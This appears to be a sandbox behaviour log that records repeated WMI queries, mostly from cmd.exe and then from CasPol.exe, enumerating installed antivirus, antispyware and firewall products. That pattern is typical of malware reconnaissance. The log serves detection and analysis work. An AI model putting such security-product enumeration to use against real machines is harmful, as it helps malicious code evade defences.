Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\SysWOW64\cmd.eXe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
